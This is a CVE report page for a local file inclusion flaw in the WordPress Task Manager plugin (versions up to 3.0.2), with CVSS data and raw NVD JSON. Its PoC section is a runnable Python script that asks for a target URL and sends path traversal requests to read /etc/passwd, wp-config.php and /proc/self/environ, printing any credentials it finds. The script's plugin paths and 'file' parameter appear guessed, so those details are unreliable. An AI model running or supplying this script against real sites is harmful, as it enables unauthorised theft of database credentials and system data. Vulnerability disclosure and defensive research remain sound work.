Security Vulnerability Report
中文
CVE-2025-60078 CVSS 7.5 HIGH

CVE-2025-60078

Published: 2025-12-18 08:16:08
Last Modified: 2026-04-28 19:34:34

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Agence web Eoxia – Montpellier Task Manager task-manager allows PHP Local File Inclusion.This issue affects Task Manager: from n/a through <= 3.0.2.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WordPress Task Manager插件 <= 3.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60078 PoC - WordPress Task Manager LFI # Target: WordPress with Task Manager Plugin <= 3.0.2 import requests import sys target = input("Enter target URL (e.g., http://target.com): ").rstrip('/') # Common WordPress paths with Task Manager plugin paths = [ '/wp-content/plugins/task-manager/views/frontend/task_rendering.php', '/wp-content/plugins/task-manager/external/phpthumb/thumb.php', '/wp-content/plugins/task-manager/controller/task_controller.php' ] # Sensitive files to attempt reading files = [ '../../../../../../../../etc/passwd', '../../../../../../../../wp-config.php', '../../../../../../../../../../../var/www/html/wp-config.php', '../../../../../../../../../proc/self/environ' ] print(f"[*] Testing CVE-2025-60078 LFI on {target}") print(f"[*] Target plugin: Task Manager <= 3.0.2\n") for path in paths: for file in files: url = f"{target}{path}?file={file}" try: response = requests.get(url, timeout=10) if 'root:' in response.text or 'DB_NAME' in response.text: print(f"[!] VULNERABLE! Found sensitive data at:") print(f" URL: {url}") print(f" Status: {response.status_code}") print(f"[+] Response snippet: {response.text[:500]}...") sys.exit(0) elif response.status_code == 200 and len(response.text) > 0: print(f"[*] Possible LFI at {url}") except requests.exceptions.RequestException as e: print(f"[-] Error testing {url}: {e}") print("\n[*] Testing complete. No obvious LFI detected.") print("[*] Note: Manual testing may be required based on plugin configuration.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60078", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:07.917", "lastModified": "2026-04-28T19:34:33.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Agence web Eoxia – Montpellier Task Manager task-manager allows PHP Local File Inclusion.This issue affects Task Manager: from n/a through <= 3.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/task-manager/vulnerability/wordpress-task-manager-plugin-3-0-2-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}